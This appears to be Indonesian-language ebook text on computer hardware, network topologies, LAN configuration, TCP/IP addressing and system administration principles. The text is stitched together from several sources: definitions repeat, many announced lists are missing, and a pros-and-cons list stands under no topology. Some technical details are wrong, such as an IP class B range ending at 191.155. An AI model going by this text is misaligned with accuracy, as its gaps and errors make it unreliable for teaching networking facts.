Background Cover ini menunjukkan Keaslian Ebook ini yang sesuai / sama dengan
Cover CD depan aslinya. Dan bila background / Cover setiap Ebook yang ada
dalam CD tidak sama dengan cover CD depan, maka Ebook tersebut tidak asli.
Komputer dan Jaringan
CPU
Processor
Input Control Unit Output
Device ALU Device
ROM
RAM
Memori
Dari penjelasan diatas dapat kita simpulkan bahwa prinsip kerja komputer tersebut
diawali memasukan data dari perangkat input, lalu data tersebut diolah sedemikian rupa
oleh CPU sesuai yang kita inginkan dan data yang telah diolah tadi disimpan dalam
memori komputer atau disk. Data yang disimpan dapat kita lihat hasilnya melalui
perangkat keluaran.
2. Komponen-Komponen Komputer
Komputer terdiri dari tiga komponen utama yang tidak dapat dipisahkan, yaitu ;
Hardware (perangkat keras), merupakan peralatan fisik dari komputer yang dapat kita
lihat dan rasakan. Hardware ini terdiri dari ;
Input/Output Device (I/O Device)
Terdiri dari perangkat masukan dan keluaran, seperti keyboard dan printer. (lihat sub
menu periferal)
3. Penggolongan Komputer
Beberapa tahun lalu, penggolongan komputer dilakukan atas dasar besarnya RAM
yang ada tiap komputer. Waktu itu, komputer yang memiliki memori atau RAM antara 512
KB hingga 1 MB disebut dengan Komputer Mikro dan yang memiliki RAM lebih dari 1 MB
disebut Komputer Mini. Penggolongan seperti ini sekarang tidak tepat lagi, karena
komputer sakupun sekarang sudah banyak yang memiliki RAM lebih besar dari 1 MB. ( 1
MB = 1.024 KB)
Penggolongan jenis-jenis komputer yang lebih tepat adalah berdasarkan jenis
prosesor yang ada pada komputer, karena
kemampuan kerja komputer ditentukan oleh
kemampuan prosesornya, semakin tinggi
jenis prosesor yang digunakan, maka semakin
tinggi pulalah kinerja dari komputer tersebut.
Penggolongan komputer berdasarkan criteria
lain masih dimungkinkan, misalnya
berdasarkan ukuran fisik, system operasi, dan jenis
data yang diolah. (lihat tabel )
5
CPU. Namun didalam CPU ini sebenarnya tidak hanya terdapat prosesor saja,
tetapi juga ada perangkat penyimpanan dan mungkin saja dipasangi perangkat
tambahan (periferal). Komputer jenis inilah yang paling banyak digunakan, baik itu
di rumah, kantor, lembaga kursus, sekolah dll. Dengan menambahkan berbagai
perangkat tambahan, komputer PC dapat menandingi komputer mainframe dan
mini, seperti telah dijelaskan diatas.
Banyak perifel lain yang mampu menambah kemampuan komputer menjadi mesin yang
lain. Untuk lebih jelasnya perhatikan tabel berikut ini.
Periferal
1. Network Card
2. Modem
3. Midi Card
Input Device 4. TV Card
1. Keyboard 5. dll
2. Mouse
3. Joystick
4. Track Ball Output Device
5. Light Pen CPU 1. Speaker
6. Ocr Scanner 1. Prosesor 2. Monitor
7. Image Scanner 2. RAM 3. Printer
8. Bar Code Reader 1. ROM 4. Projector
9. Digitizer 5. dll
10. Voice Recognition
11. Touch Screen
12. Video Player
Storage Device
13. Kamera
2. Disket
14. dll
3. Harddisk
4. CD-ROM
5. Optical Disk
6. PCMCIA Card
7. Magnetic Tape
8. Cartridge
9. dll
Mengenal Jaringan
JARINGAN komputer adalah sebuah kumpulan komputer, printer dan peralatan lainnya
yang terhubung dalam satu kesatuan. Informasi dan data bergerak melalui kabel-kabel
atau tanpa kabel sehingga memungkinkan pengguna jaringan komputer dapat saling
bertukar dokumen dan data, mencetak pada printer yang sama dan bersama-sama
menggunakan hardware/software yang terhubung dengan jaringan. Setiap komputer,
printer atau periferal yang terhubung dengan jaringan disebut node. Sebuah jaringan
komputer dapat memiliki dua, puluhan, ribuan atau bahkan jutaan node.
4. Internet
Sebenarnya terdapat banyak jaringan didunia ini, seringkali menggunakan perangkat
keras dan perangkat lunak yang berbeda-beda . Orang yang terhubung ke jaringan
sering berharap untuk bisa berkomunikasi dengan orang lain yang terhubung ke
jaringan lainnya. Keinginan seperti ini memerlukan hubungan antar jaringan yang
seringkali tidak kampatibel dan berbeda. Biasanya untuk melakukan hal ini diperlukan
sebuah mesin yang disebut gateway guna melakukan hubungan dan melaksanakan
terjemahan yang diperlukan, baik perangkat keras maupun perangkat lunaknya.
Kumpulan jaringan yang terinterkoneksi inilah yang disebut dengan internet.
Keuntungan
• Hemat kabel
• Layout kabel sederhana
• Mudah dikembangkan
Kerugian
• Deteksi dan isolasi kesalahan sangat kecil
• Kepadatan lalu lintas
• Bila salah satu client rusak, maka jaringan tidak bisa berfungsi.
• Diperlukan repeater untuk jarak jauh
7. Topologi TokenRING
Metode token-ring (sering disebut ring saja) adalah cara menghubungkan komputer
sehingga berbentuk ring (lingkaran). Setiap simpul mempunyai tingkatan yang sama.
Jaringan akan disebut sebagai loop, data dikirimkan kesetiap simpul dan setiap
informasi yang diterima simpul diperiksa alamatnya apakah data itu untuknya atau
bukan
Keuntungan
• Hemat Kabel
Kerugian
• Peka kesalahan
• Pengembangan jaringan lebih kaku
8. Topologi STAR
Kontrol terpusat, semua link harus melewati pusat yang menyalurkan data tersebut
kesemua simpul atau client yang dipilihnya. Simpul pusat dinamakan stasium primer
atau server dan lainnya dinamakan stasiun sekunder atau client server. Setelah
hubungan jaringan dimulai oleh server maka setiap client server sewaktu-waktu dapat
menggunakan hubungan jaringan tersebut tanpa menunggu perintah dari server.
Keuntungan
• Paling fleksibel
• Pemasangan/perubahan stasiun sangat mudah dan tidak mengganggu bagian
jaringan lain
• Kontrol terpusat
• Kemudahan deteksi dan isolasi kesalahan/kerusakan
• Kemudahaan pengelolaan jaringan
Kerugian
• Boros kabel
• Perlu penanganan khusus
• Kontrol terpusat (HUB) jadi elemen kritis
Sistem jaringan ini juga dapat dipakai di rumah. Pemakai komputer yang memiliki
komputer ‘kuno’, misalnya AT, dan ingin memberli komputer baru, katakanlah Pentium
II, tidak perlu membuang komputer lamanya. Ia cukup memasang netword card di
kedua komputernya kemudian dihubungkan dengan kabel yang khusus digunakan
untuk sistem jaringan. Dibandingkan dengan ketiga cara diatas, sistem jaringan ini
lebih sederhana sehingga lebih mudah dipejari dan dipakai.
Pendahuluan
Jaringan komputer bukanlah sesuatu yang baru saat ini. Hampir di setiap
perusahaan terdapat jaringan komputer untuk memperlancar arus informasi di
dalam perusahaan tersebut. Internet yang mulai populer saat ini adalah suatu
jaringan komputer raksasa yang merupakan jaringan komputer yang terhubung
dan dapat saling berinteraksi. Hal ini dapat terjadi karena adanya
perkembangan teknologi jaringan yang sangat pesat, sehingga dalam beberapa
tahun saja jumlah pengguna jaringan komputer yang tergabung dalam Internet
berlipat ganda.
Jaringan komputer
1. Pengertian
Jaringan komputer adalah sebuah kumpulan komputer, printer dan
peralatan lainnya yang terhubung. Informasi dan data bergerak melalui
kabel-kabel sehingga memungkinkan pengguna jaringan komputer dapat
saling bertukar dokumen dan data, mencetak pada printer yang sama dan
bersama sama menggunakan hardware/software yang terhubung dengan
jaringan. Tiap komputer, printer atau periferal yang terhubung dengan
jaringan disebut node. Sebuah jaringan komputer dapat memiliki dua,
puluhan, ribuan atau bahkan jutaan node.
Sebuah jaringan biasanya terdiri dari 2 atau lebih komputer yang
saling berhubungan diantara satu dengan yang lain, dan saling berbagi
sumber daya misalnya CDROM, Printer, pertukaran file, atau
memungkinkan untuk saling berkomunikasi secara elektronik. Komputer
yang terhubung tersebut, dimungkinkan berhubungan dengan media kabel,
saluran telepon, gelombang radio, satelit, atau sinar infra merah.
2. Jenis-Jenis jaringan
Ada 3 macam jenis Jaringan/Network yaitu :
a. Local Area Network (LAN) /Jaringan Area Lokal.
Sebuah LAN, adalah jaringan yang dibatasi oleh area yang relatif
kecil, umumnya dibatasi oleh area lingkungan seperti sebuah
perkantoran di sebuah gedung, atau sebuah sekolah, dan biasanya tidak
jauh dari sekitar 1 km persegi.
Beberapa model konfigurasi LAN, satu komputer biasanya di
jadikan sebuah file server. Yang mana digunakan untuk menyimpan
perangkat lunak (software) yang mengatur aktifitas jaringan, ataupun
sebagai perangkat lunak yang dapat digunakan oleh komputer-
komputer yang terhubung ke dalam network. Komputer-komputer
yang terhubung ke dalam jaringan (network) itu biasanya disebut
dengan workstation. Biasanya kemampuan workstation lebih di bawah
dari file server dan mempunyai aplikasi lain di dalam harddisknya
selain aplikasi untuk jaringan. Kebanyakan LAN menggunakan media
kabel untuk menghubungkan antara satu komputer dengan komputer
lainnya.
3. Protokol
Protokol adalah aturan-aturan main yang mengatur komunikasi
diantara beberapa komputer di dalam sebuah jaringan, aturan itu termasuk
di dalamnya petunjuk yang berlaku bagi cara-cara atau metode mengakses
sebuah jaringan, topologi fisik, tipe-tipe kabel dan kecepatan transfer data.
1. Ethernet
2. Local Talk
3. Token Ring
4. FDDI
5. ATM
Ethernet
Token Ring
FDDI
ATM
File Servers
Processor minimal 166 megahertz atau processor yang lebih cepat lagi
(Pentium Pro, Pentium II, PowerPC).
Sebuah Harddisk yang cepat dan berkapasitas besar atau kurang lebih 10
GB
Sebuah RAID (Redundant Array of Inexpensive Disks).
Sebuah tape untuk back up data (contohnya . DAT, JAZ, Zip, atau CD-
RW )
Mempunyai banyak port network
Kartu jaringan yang cepat dan Reliabilitas
Kurang lebih 32 MB memori
Workstations
Kartu jaringan Token Ring terlihat hampir sama dengan Kartu jaringan Ethernet.
Satu perbedaannya adalah tipe konektor di belakang KArtu jaringannya, Token
Ring umumnya mempunyai tipe konektor 9 Pin DIN yang menyambung Kartu
jaringan ke Kabel Network.
Hub/Konsentrator
Contoh yang paling mudah adalah pada sebuah LAN menggunakan topologi
Bintang dengan menggunakan kabel unshielded twisted pair. Dimana diketahui
panjang maksimal untuk sebuah kabel unshileded twisted pair adalah 100 meter,
maka untuk menguatkan sinyal dari kabel tersebut dipasanglah sebuah repeater
pada jaringan tersebut.
Bridges / Jembatan
Adalah sebuah perangkat yang membagi satu buah jaringan kedalam dua
buah jaringan, ini digunakan untuk mendapatkan jaringan yang efisien, dimana
kadang pertumbuhan network sangat cepat makanya di perlukan jembatan untuk
itu. Kebanyakan Bridges dapat mengetahui masing-masing alamat dari tiap-tiap
segmen komputer pada jaringan sebelahnya dan juga pada jaringan yang lain di
sebelahnya pula. Diibaratkan bahwa Bridges ini seperti polisi lalu lintas yang
mengatur di persimpangan jalan pada saat jam-jam sibuk. Dia mengatur agar
informasi di antara kedua sisi network tetap jalan dengan baik dan teratur. Bridges
juga dapat di gunakan untuk mengkoneksi diantara network yang menggunakan
tipe kabel yang berbeda ataupun topologi yang berbeda pula.,.
Routers
Sebuah Router mengartikan informaari dari satu jaringan ke jaringan yang lain,
dia hampir sama dengan Bridge namun agak pintar sedikit, router akan mencari
jalur yang terbaik untuk mengirimkan sebuah pesan yang berdasakan atas alamat
tujuan dan alamat asal.
5. Topologi/Bentuk Jaringan
Dalam topologi jaringan bintang, salah satu sentral dibuat sebagai sentral
pusat. Bila dibandingkan dengan sistem mesh, sistem ini mempunyai
tingkat kerumitan jaringan yang lebih sederhana sehingga sistem menjadi
lebih ekonomis, tetapi beban yang dipikul sentral pusat cukup berat.
Dengan demikian kemungkinan tingkat kerusakan atau gangguan dari
sentral ini lebih besar.
1. http://www.ai3.itb.ac.id/Tutorial/LAN.html
2. http://www.w3.org/TR/REC-html40
3. http://sunsite.ui.ac.id/student/ristek/sig/infosys/artikel/artikel3/protokol1.htm
Pengantar Pengelolaan Sistem
Banyak versi yang disampaikan mengenai pedoman pengadministrasian sebuah sistem, baik itu berdasarkan
platform sistem yang digunakan maupun berdasarkan hal lain yang dianggap merupakan sebuah teknik
pengadministrasian sebuah sistem. Namun, ada beberapa kesamaan yang merupakan dasar bagi pengelolaan
administrasi sebuah sistem yaitu sebagai berikut :
o Otomatiskan semuanya
o Dokumentasikan semuanya
o Komunikasikan selalu
o Pahami sumber daya yang ada
o Pahami pengguna sistem
o Pahami bisnis yang berjalan
o Keamanan tidak dapat dikesampingkan
o Ramalkan terlebih dahulu
o Perhitungkan hal-hal yang tak terduga
I. Otomatiskan Semuanya
Kebanyakan dari para sistem administrator (populer : sysadmin) selalu dalam posisi kewalahan, entah itu oleh
para pengguna sistem yang harus dilayani terus-menerus dan kebanyakan tidak sabar menunggu, sistem yang
berjalan dan selalu memuntut perhatian dan pengawasan atau keduanya.
Pada keadaan tersebut di atas, proses otomatisasi akan sangat membantu meringankan beban para sistem
administrator ini. Ada beberapa hal lumrah yang bisa diotomatisasikan seperti :
Daftar tersebut jelas bukan daftar lengkap yang dapat dijadikan pedoman otomatisasi sebuah sistem yang
berjalan , banyak hal yang bisa digali dengan ketekunan seperti mencari program yang sesuai, menulis script,
atau mengekploitasi kemampuan sistem yang ada untuk otomatisasi. Otomatisasi bisa sangat bermanfaat dan
memberi nilai layanan lebih bagi para pengguna sistem.
Kebanyakan kebiasaan sistem administrator adalah menunda pendokumentasian aktifitas dengan berbagai alasan
umum berikut ini :
Sayangnya komentar-komentar di atas biasanya tidak berjalan seperti apa yang diucapkan tersebut. Seorang
sistem administrator tidak akan mengambil resiko dengan berkelakar, “Akan saya kerjakan nanti.” Sebelum
semuanya menjadi berantakkan sama sekali dan mungkin penyebabnya sepele, kehilangan kesempatan untuk
mendokumentasikan hal-hal yang penting. Seorang sistem administrator mungkin dapat mengingat banyak hal
dari aktifitasnya mengelola sebuah sistem namun jarang ada yang memiliki ingatan photographic memory
seperti yang dimiliki Annemarie Schimmel, karena itu pendokumentasian akan sangat penting. Lalu, apakah
juga benar menyimpan semuanya untuk diri sendiri ? Tidak juga, sekali waktu seorang sistem administrator
kunci tidak dapat datang ke kantor atau keluar dari tempat kerjanya, akan diperlukan orang lain untuk
menggantikan tugas-tugasnya mulai dari maintenance hingga troubleshooting, saat itu dokumentasi akan
menjadi sebuah referensi berharga untuk menjaga keberlangsungan hidup dari sistem yang dikelolanya.
Ada beberapa hal penting yang dapat didokumentasikan, sebagiannya adalah sebagai berikut :
Kebijakan
Kebijakan ditulis / disusun sebagai sebagai panduan formal dan kejelasan hubungan antara komunitas pengguna
komputer dengan sistem yang dikelola.
Prosedur
Prosedur adalah langkah-langkah yang perlu diambil untuk mencapai atau menyelesaikan sebuah tugas.
Mungkin bisa berupa prosedur backup, manajemen account user, troubleshooting dan banyak lagi lainnya
Perubahan
Sebagian besar waktu dari seorang sistem administrator dihabiskan untuk membuat berbagai macam perubahan
untuk berbagai kepentingan. Mengkonfigurasi ulang server, tweaking, mengganti program dan sebagainya.
Pendokumentasian sebaiknya menggunakan tatacara penulisan yang teratur dan tetap. Tentunya karena kita tidak
ingin kebingungan dalam mencari informasi atas perubahan yang dilakukan beberapa bulan kebelakan karena
cara pendokumentasian yang tidak konsisten. Menimal sebuah pendokumentasian memuat beberapa hal sebagai
berikut :
o Nama / Inisial orang yang melakukan perubahan
o Tanggal perubahan dilakukan
o Alasan perubahan tersebut dilakukan
Contoh :
DNA – 24-Okober-2003 : Perubahan IP Address untuk kepentingan segmentasi grup pengguna berdasarkan
departemen.
Komunikasikan sebisa mungkin aktifitas perubahan dari sistem jika hal tersebut sudah menyangkut dengan para
pengguna sistem. Sebuah perubahan kecil yang dilakukan dan tidak diberitahukan kepada para pengguna sistem
akan mengakibatkan kebingungan bagi pengguna sistem yang ada.
Di sebuah kantor terdapat sebuah program mail server, karena pengguna email di kantor tersebut semakin
banyak, program yang ada sudah tidak begitu memenuhi kebutuhan tersebut. Sistem administrator memutuskan
mengganti program mail server tersebut menggunakan sebuah program baru sekaligus membuka layanan web
mail.
Dimulai hari Senin, 24 Oktober 2003 pukul 17.00 akan dilakukan penggantian program mail server yang ada di
kantor ini. Hal tersebut dikarenakan program yang lama sudah tidak memadai lagi serta akan dilakukan
pembukaan layanan webmail dengan program yang baru ini.
Diperkirakan penggantian program mail server itu akan memakan waktu 5 jam mulai pukul 17.00 – 23.00 WIB.
Untuk sementara waktu layanan email pada jam tersebut tidak akan berfungsi sama sekali.
Jika ada pertanyaan dan memerlukan informasi lebih jelas dapat menghubungi sistem administrator di extension
1208.
Memberitahukan kepada pengguna apa yang sedang dilakukan
Biasanya diumumkan di waktu terakhir menjelang dilakukannya perubahan tersebut. Melanjutkan situasi rekaan
sebelumnya, berikut ini adalah contoh dari sebuah reminder.
Diberitahukan sekali lagi bahwa mail server yang akan mengalami penggantian mail server akan dinonaktifkan
segera. Untuk itu dapat dilakukan downloads/cek mail terakhir untuk menarik email dari program server lama.
Diingatkan juga untuk tidak melakukan aktifitas email sebelum adanya pemberitahuan lebih lanjut.
Dengan demikian para pengguna sudah mendapat pemberitahuan yang cukup dan sistem administrator dapat
melakukan aktifitas perubahan yang diinginkan.
Perubahan atas program mail server telah dilakukan dan aktifitas email telah dapat diilakukan kembali
sebagaimana biasanya. Untuk webmail dapat mengakses ke alamat http://mail/server. Untuk login dapat
menggunakan alamat email masing-masing, demikian juga dengan password.
Namun, ada beberapa kemungkinan untuk webmail tidak dapat berjalan dengan baik jika digunakan dengan
Internet Explorer versi 5. Untuk lebih mudahnya para pengguna yang masih menggunakan Internet Explorer
versi 5 dapat menghubungi kami agar dapat dilakukan remote untuk mengupdate Internet Exploler tersebut.
Untuk menghubungi dan bertanya dapat menghubungi sistem administrator di line 1208.
Pengadministrasian sebuah sistem sebenarnya adalah masalah dalam menyeimbangkan antara sumber daya yang
ada dengan para pengguna sistem juga dengan program yang digunakan oleh sumber daya tersebut.
Meskipun banyak orang cukup bingung dengan istilah pengguna/user, pengguna/user adalah mereka yang
menggunakan sistem dan sumber daya yang disediakan, tidak lebih dan tidak kurang. Para pengguna adalah
pusat perhatian yang menentukan kesuksesan pengelolaan sebuah sistem. Tanpa memahami para pengguna,
bagaimana seorang sistem administrator dapat memahami sumber daya yang mereka perlukan ?
Entah seorang system administrator bekerja untuk perusahaan besar , multinasional atau untuk komunitas kecil,
dia tetap harus memahami lingkungan tempat dia bekerja. Mengenai hal tersebut, bisa disimpulkan dalam satu
buah pertanyaan :
Hal tersebut menjadi kunci untuk memahami fungsi sistem untuk berbagai kepentingan secara umum misalnya
sebagai berikut :
o Aplikasi yang harus berjalan pada rentang waktu / periode tertentu (mingguan, bulanan, semesteran atau
tahunan)
o Waktu yang tepat untuk melakukan dan menyelesaikan perawatan sistem
o Teknologi baru yang tepat untuk digunakan dan menunjang
Tidak menjadi masalah apa yang seorang system administrator pikirkan tentang lingkungan dari sistem yang
berjalan, bagaimanapun dia tetap tidak bisa menjamin masalah keamanan 100%. Bahkan sebuah PC yang tidak
tersambung ke internet pun bisa menjadi masalah keamanan.
Karenanya, sangat penting untuk memperhatikan implikasi keamanan dari apa yang telah dikerjakan oleh
seorang system administrator. Berikut ini ada beberapa point yang harus diperhatikan :
Dan ketika seorang system administrator memikirkan masalah keamanan, jangan keliru hanya mengasumsikan
bahwa para pengganggu yang mungkin menyerang sistem adalah dari luar perusahaan. Seringkali terjadi para
perusak tersebut muncul dari dalam perusahaan itu sendiri. Jadi ketika berjalan mengelilingi kantor, perhatikan
orang-orang yang ada dan ajukan pertanyaan pada diri sendiri :
“Apa yang akan terjadi jika orang itu menembus kemanan sistem ?”
Hal tersebut tidak berarti seorang system administrator menuduh rekan kerjanya sebagai kriminal kantor. Itu
hanya berarti dia harus melihat dan membedakan tipe dan jenis pekerja yang ada sehingga dapat menerapkan
jenis keamanan yang cocok untuk digunakan.
Rekayasa Sosial
Reaksi pertama pada kebanyakan sistem administrator ketika dihadapkan pada masalah keamanan adalah
terkonsentrasi pada aspek teknologi, padahal seringkali masalah kemanan tidak selalu muncul dari aspek
teknologi, melainkan dari aspek kemanusiaan atau sosial.
Orang-orang yang berniat untuk menembus keamanan seringkali menggunakan aspek kemanusiaan untuk
menembus aspek teknologi. Seperti lampu lalu lintas, dari sisi kebijakan dan prosedur sebagai panduan
keamanan mungkin bisa dibilang baik. Namun, kebijakan dan prosedur tersebut hanya akan berhasil jika
orang-orang mengikutinya.
Tidak ada jawaban yang mudah untuk masalah kemanan. Mendidik para pengguna mungkin dapat membantu.
Lakukanlah hal-hal yang dapat membuat komunitas pengguna sistem peduli pada masalah kemanan dan
rekayasa sosial.
Jika seorang system administrator mengikuti pedoman-pedoman yang sudah ada, mungkin dia akan menjadi
seorang system administrator yang hebat, tapi untuk saat itu saja. Sewaktu-waktu, lingkungan akan berubah dan
satu hari nanti system administrator yang hebat itu akan terlihat demikian bodoh. Apa alasannya ? System
Administrator yang hebat tersebut gagal untuk meramalkan perkembangan ke depan.
Sudah tentu, tidak ada yang dapat memperkirakan masa depan akurat 100%. Namun, dengan hanya sedikit
curahan perhatian, akan memudahkan seorang system administrator dalam membaca banyak tanda-tanda
perubahan.
Contoh:
Rencana pengembangan organisasi perusahaan atau ekspansi usaha dari perusahaan merupakan tanda yang
cukup jelas bahwa mungkin dalam waktu dekat ini harus mengadakan training bagi para pengguna sistem baru
atau penambahan unit komputer baru.
Meskipun kalimat “perhitungkan yang tak terduga” cukup aneh, hal tersebut merefleksikan sebuah kenyatan
yang harus sistem administrator pahami :
Setelah datang masa yang nyaman selalu diiringi saat-saat tidak menyenangkan adalah fakta kehidupan. Apa
yang bisa diperhatikan oleh seorang system administrator ? Jawabannya cukup fleksibel. Meningkatkan kinerja
dengan banyak cara, yang membuat berbagai pilihan menjadi mungkin untuk ditangani. Masalah kapasitas
harddisk di server misalnya, tidak ada kapasitas harddisk yang bisa memenuhi kepentingan penyimpanan data
dari hari ke hari terus menerus. Adalah logis jika pada satu titik, sorang system administrator harus berhadapan
dengan situasi penambahan harddisk yang sangat diperlukan pada saat itu juga, bahkan hanya untuk menampung
data beberapa byte saja.
Apa yang bisa diperhitungkan dari kejadian yang waktunya tak terduga seperti itu ? Seorang system
administrator bisa menyediakan persediaan harddisk dari budget yang ada misalnya.
Dengan mencoba untuk mengantisipasi masalah sebelum terjadi, seorang system administrator akan ada dalam
posisi siap untuk merespon dengan cepat dan efektif, ketimbang jika dirinya dalam keadaan terkejut.
REFERENSI
[Redhat Inc. 2003] Redhat Linux : Administration Primer. Dan sumber lain terkait.
Teknik Konfigurasi LAN
Mengenal LAN
TCP/IP (Transmission Control Protocol/Internet Protocol) adalah sekelompok protokol yang
mengatur komunikasi data komputer di internet. Komputer-komputer yang terhubung ke internet
berkomunikasi dengan protokol TCP/IP, karena menggunakan bahasa yang sama perbedaan jenis
komputer dan sistem operasi tidak menjadi masalah. Komputer PC dengan sistem operasi Windows
dapat berkomunikasi dengan komputer Macintosh atau dengan Sun SPARC yang menjalankan
solaris. Jadi, jika sebuah komputer menggunakan protokol TCP/IP dan terhubung langsung ke
internet, maka komputer tersebut dapat berhubungan dengan komputer di belahan dunia mana pun
yang juga terhubung ke internet.
Local Area Network (LAN) adalah sejumlah komputer yang saling dihubungkan bersama di dalam
satu areal tertentu yang tidak begitu luas, seperti di dalam satu kantor atau gedung. Secara garis
besar terdapat dua tipe jaringan atau LAN, yaitu jaringan Peer to Peer dan jaringan Client-Server.
Pada jaringan peer to peer, setiap komputer yang terhubung ke jaringan dapat bertindak baik sebagai
workstation maupun server. Sedangkan pada jaringan Client-Server, hanya satu komputer yang
bertugas sebagai server dan komputer lain berperan sebagai workstation. Antara dua tipe jaringan
tersebut masing-masing memiliki keunggulan dan kelemahan, di mana masing-masing akan
dijelaskan.
LAN tersusun dari beberapa elemen dasar yang meliputi komponen hardware dan software, yaitu
1. Komponen Fisik
Personal Computer (PC), Network Interface Card (NIC), Kabel, Topologi jaringan.
2. Komponen Software
Sistem Operasi Jaringan, Network Adapter Driver, Protokol Jaringan.
Saat ini terdapat jenis network card yang banyak digunakan, yaitu PCI
Tipe Pengkabelan
Terdapat beberapa tipe pengkabelan yang biasa digunakan dan dapat digunakan untuk
mengaplikasikan Windows, yaitu:
Saat ini ada beberapa grade, atau kategori dari kabel twisted pair. Kategori 5 adalah yang paling
reliable dan memiliki kompabilitas yang tinggi, dan yang paling disarankan. Berjalan baik pada
10Mbps dan Fast Ethernet (100Mbps). Kabel kategori 5 dapat dibuat straight-through atau crossed.
Kabel straight through digunakan untuk menghubungkan komputer ke HUB. Kabel crossed
digunakan untuk menghubungkan HUB ke HUB. Panjang kabel maksimum kabel Twisted-Pair
adalah 100 m.
Protokol TCP/IP
Karena penting peranannya pada sistem operasi Windows dan juga karena protokol TCP/IP
merupakan protokol pilihan (default) dari Windows. Protokol TCP berada pada lapisan Transport
model OSI (Open System Interconnection), sedangkan IP berada pada lapisan Network mode OSI
IP Address
IP address adalah alamat yang diberikan pada jaringan komputer dan peralatan jaringan yang
menggunakan protokol TCP/IP. IP address terdiri atas 32 bit angka biner yang dapat dituliskan
sebagai empat kelompok angka desimal yang dipisahkan oleh tanda titik seperti 192.168.0.1.
Tabel 1.1. Contoh IP address
Network ID Host ID
192 168 0 1
IP address terdiri atas dua bagian yaitu network ID dan host ID, dimana network ID menentukan
alamat jaringan komputer, sedangkan host ID menentukan alamat host (komputer, router, switch).
Oleh sebab itu IP address memberikan alamat lengkap suatu host beserta alamat jaringan di mana
host itu berada.
Kelas-kelas IP Address
Untuk mempermudah pemakaian, bergantung pada kebutuhan pemakai, IP address dibagi dalam tiga
kelas seperti diperlihatkan pada tabel 1.2.
IP address kelas A diberikan untuk jaringan dengan jumlah host yang sangat besar. Range IP
1.xxx.xxx.xxx. – 126.xxx.xxx.xxx, terdapat 16.777.214 (16 juta) IP address pada tiap kelas A. IP
address kelas A diberikan untuk jaringan dengan jumlah host yang sangat besar. Pada IP address
kelas A, network ID ialah 8 bit pertama, sedangkan host ID ialah 24 bit berikutnya.
Dengan demikian, cara membaca IP address kelas A, misalnya 113.46.5.6 ialah:
Network ID = 113
Host ID = 46.5.6
Sehingga IP address diatas berarti host nomor 46.5.6 pada network nomor 113.
IP address kelas B biasanya dialokasikan untuk jaringan berukuran sedang dan besar. Pada IP
address kelas B, network ID ialah 16 bit pertama, sedangkan host ID ialah 16 bit berikutnya. Dengan
demikian, cara membaca IP address kelas B, misalnya 132.92.121.1
Network ID = 132.92
Host ID = 121.1
Sehingga IP address di atas berarti host nomor 121.1 pada network nomor 132.92. dengan panjang
host ID 16 bit, network dengan IP address kelas B dapat menampung sekitar 65000 host. Range IP
128.0.xxx.xxx – 191.155.xxx.xxx
IP address kelas C awalnya digunakan untuk jaringan berukuran kecil (LAN). Host ID ialah 8 bit
terakhir. Dengan konfigurasi ini, bisa dibentuk sekitar 2 juta network dengan masing-masing
network memiliki 256 IP address. Range IP 192.0.0.xxx – 223.255.255.x.
Pengalokasian IP address pada dasarnya ialah proses memilih network Id dan host ID yang tepat
untuk suatu jaringan. Tepat atau tidaknya konfigurasi ini tergantung dari tujuan yang hendak dicapai,
yaitu mengalokasikan IP address seefisien mungkin.
1. Root-level domain: merupakan tingkat teratas yang ditampilkan sebagai tanda titik (.).
2. Top level domain: kode kategori organisasi atau negara misalnya: .com untuk dipakai oleh
perusahaan; .edu untuk dipakai oleh perguruan tinggi; .gov untuk dipakai oleh badan
pemerintahan. Selain itu untuk membedakan pemakaian nama oleh suatu negara dengan
negara lain digunakan tanda misalnya .id untuk Indonesia atau .au untuk australia.
3. Second level domain: merupakan nama untuk organisasi atau perusahaan, misalnya:
microsoft.com; yahoo.com, dan lain-lain.
DHCP berfungsi untuk memberikan IP address secara otomatis pada komputer yang menggunakan
protokol TCP/IP. DHCP bekerja dengan relasi client-server, dimana DHCP server menyediakan
suatu kelompok IP address yang dapat diberikan pada DHCP client. Dalam memberikan IP address
ini, DHCP hanya meminjamkan IP address tersebut. Jadi pemberian IP address ini berlangsung
secara dinamis.
Topologi Jaringan adalah gambaran secara fisik dari pola hubungan antara komponen-komponen
jaringan, yang meliputi server, workstation, hub dan pengkabelannnya. Terdapat tiga macam
topologi jaringan umum digunakan, yaitu Bus, Star dan Ring.
Topologi Bus
Pada topologi Bus digunakan sebuah kabel tunggal atau kabel pusat di mana seluruh workstation dan
server dihubungkan. Keunggulan topologi Bus adalah pengembangan jaringan atau penambahan
workstation baru dapat dilakukan dengan mudah tanpa mengganggu workstation lain. Kelemahan
dari topologi ini adalah bila terdapat gangguan di sepanjang kabel pusat maka keseluruhan jaringan
akan mengalami gangguan.
1. Topologi Star
Pada topologi Star, masing-masing workstation dihubungkan secara langsung ke server atau hub.
Keunggulan dari topologi tipe Star ini adalah bahwa dengan adanya kabel tersendiri untuk setiap
workstation ke server, maka bandwidth atau lebar jalur komunikasi dalam kabel akan semakin lebar
sehingga akan meningkatkan unjuk kerja jaringan secara keseluruhan. Dan juga bila terdapat
gangguan di suatu jalur kabel maka gangguan hanya akan terjadi dalam komunikasi antara
workstation yang bersangkutan dengan server, jaringan secara keseluruhan tidak mengalami
gangguan. Kelemahan dari topologi Star adalah kebutuhan kabel yang lebih besar dibandingkan
dengan topologi lainnya.
Gambar 1.7. Topologi star
2. Topologi Ring
Di dalam topologi Ring semua workstation dan server dihubungkan sehingga terbentuk suatu pola
lingkaran atau cincin. Tiap workstation ataupun server akan menerima dan melewatkan informasi
dari satu komputer ke komputer lain, bila alamat- alamat yang dimaksud sesuai maka informasi
diterima dan bila tidak informasi akan dilewatkan.
Kelemahan dari topologi ini adalah setiap node dalam jaringan akan selalu ikut serta mengelola
informasi yang dilewatkan dalam jaringan, sehingga bila terdapat gangguan di suatu node maka
seluruh jaringan akan terganggu.
Keunggulan topologi Ring adalah tidak terjadinya collision atau tabrakan pengiriman data seperti
pada topologi Bus, karena hanya satu node dapat mengirimkan data pada suatu saat.
Keunggulan
1. Kecepatan akses lebih tinggi karena penyediaan fasilitas jaringan dan pengelolaannya
dilakukan secara khusus oleh satu komputer (server) yang tidak dibebani dengan tugas lain
sebagai workstation.
2. Sistem keamanan dan administrasi jaringan lebih baik, karena terdapat seorang pemakai yang
bertugas sebagai administrator jaringan, yang mengelola administrasi dan sistem keamanan
jaringan.
3. Sistem backup data lebih baik, karena pada jaringan client-server backup dilakukan terpusat
di server, yang akan membackup seluruh data yang digunakan di dalam jaringan.
Kelemahan
1. Biaya operasional relatif lebih mahal.
